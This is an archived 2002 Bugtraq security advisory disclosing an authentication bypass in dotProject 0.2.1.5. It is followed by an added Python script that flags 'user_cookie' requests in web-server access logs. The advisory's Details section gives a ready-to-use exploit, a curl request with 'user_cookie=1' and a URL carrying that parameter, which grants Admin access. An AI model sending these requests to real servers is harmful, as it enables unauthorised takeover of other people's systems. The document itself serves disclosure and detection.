[26383] in bugtraq


php dotProject bypass authentication

daemon@ATHENA.MIT.EDU (pokleyzz)
Mon Jul 29 15:12:40 2002

Message-ID: <3D44B432.90103@scan-associates.net>
Date: Mon, 29 Jul 2002 11:19:14 +0800
From: pokleyzz <pokleyzz@scan-associates.net>
MIME-Version: 1.0
To: bugtraq <bugtraq@securityfocus.com>, sk <sk@scan-associates.net>,
        Shaharil Abdul Malek <shaharil@scan-associates.net>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

SCAN Associates Sdn Bhd Security Advisory

Product: dotProject 0.2.1.5 (possibly others)

Vendor URL: http://www.dotmarketing.org/dotproject/

Summary: php dotProject bypass authentication

Author: pokleyzz <pokleyzz@scan-associates.net>, sk <sk@scan-associates.net>,
shaharil <shaharil@scan-associates.net>

Description
===========
dotProject is a web-based project management system.
This application is considered a beta version.

Details
=======
Anyone can bypass authentication and log in as Admin.
It is rather simple to exploit: a user may send a crafted cookie like:

curl -b user_cookie=1 http://server/project/index.php?m=projects

Or simply append user_cookie=1 in any URL:

http://server/project/index.php?m=projects&user_cookie=1

Vendor Response 
=============== 
The vendor was contacted on 24/7/2002 but has not replied.

www.scan-associates.net <http://www.scan-associates.net>
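
For reviewing web-server access logs for the URL form of the request shown under Details, here is an added example (not part of the original advisory or of dotProject) that flags requests carrying a user_cookie query parameter. The Combined Log Format and the sample lines are assumptions constructed for illustration; the cookie form is not visible in such logs unless the server also records the Cookie header.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request-line portion of a Common/Combined Log Format entry (assumed format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

SUSPECT_PARAM = "user_cookie"  # parameter name taken from the advisory


def find_user_cookie_requests(lines):
    """Return (ip, timestamp, status, target) for every request whose query
    string carries a user_cookie parameter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        query = urlsplit(m["target"]).query
        # parse_qsl percent-decodes names before the comparison, so the
        # match is on the decoded parameter name, not on the raw text.
        params = parse_qsl(query, keep_blank_values=True)
        if any(name == SUSPECT_PARAM for name, _ in params):
            hits.append((m["ip"], m["ts"], int(m["status"]), m["target"]))
    return hits


# Constructed sample log lines (documentation addresses, not a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Jul/2002:10:01:02 +0800] "GET /project/index.php?m=projects HTTP/1.1" 200 5120',
    '198.51.100.7 - - [30/Jul/2002:10:02:13 +0800] "GET /project/index.php?m=projects&user_cookie=1 HTTP/1.1" 200 9876',
    '198.51.100.7 - - [30/Jul/2002:10:02:40 +0800] "GET /project/index.php?m=projects&user%5Fcookie=1 HTTP/1.1" 200 4321',
    '203.0.113.5 - - [30/Jul/2002:10:03:00 +0800] "GET /project/index.php?note=user_cookie HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for ip, ts, status, target in find_user_cookie_requests(SAMPLE_LOG):
        print(f"{ts} {ip} {status} {target}")
```

A 200 status on a flagged request only shows that the page was served; whether the session was treated as Admin has to be confirmed from the application side.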


